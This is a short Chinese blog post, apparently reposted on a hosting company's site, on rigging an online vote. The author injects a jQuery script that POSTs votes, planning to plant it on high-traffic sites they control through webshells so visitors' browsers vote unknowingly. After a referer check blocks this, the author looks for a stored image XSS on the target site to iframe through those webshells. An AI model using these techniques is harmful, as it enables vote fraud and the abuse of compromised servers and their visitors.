鸿 网 互 联 www.68idc.cn

webshell + xss 猥琐刷某投票

来源:互联网 作者:佚名 时间:2016-05-07 10:07
团队成员发来一个投票的地址,需要撸某某网站的一个某某投票,果断看了下,ip限制了,看到post 数据包 额 随便找个大流量shell post 数据 Js代码 script type=text/javascript src=http://code.jquery.com/jquery-latest.js/script 2 script type=text/javascrip

团队成员发来一个投票的地址,需要撸某某网站的一个某某投票,果断看了下,ip限制了,看到post 数据包
  

   额 随便找个大流量shell post 数据
Js代码
<script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script> 

2 <script type="text/javascript"> 

3  $(document).ready(function(e) { 

4   var timestamp = (new Date()).valueOf(); 

5   $.post("http://www.xxx.com/vote.json?t="+timestamp ,{itemId:10072}); 

6 }); 

观察下 firebug post 木有成功

估计判断来路了,得从本站提交才行,看来得找本站的xss配合,果断撸起,看到有博客有富文本,一番fuzz之后,找到个图片型xss

找个大流量的webshell Iframe这个页面,不过天色已晚,那就先发条邪恶的围脖


网友评论
<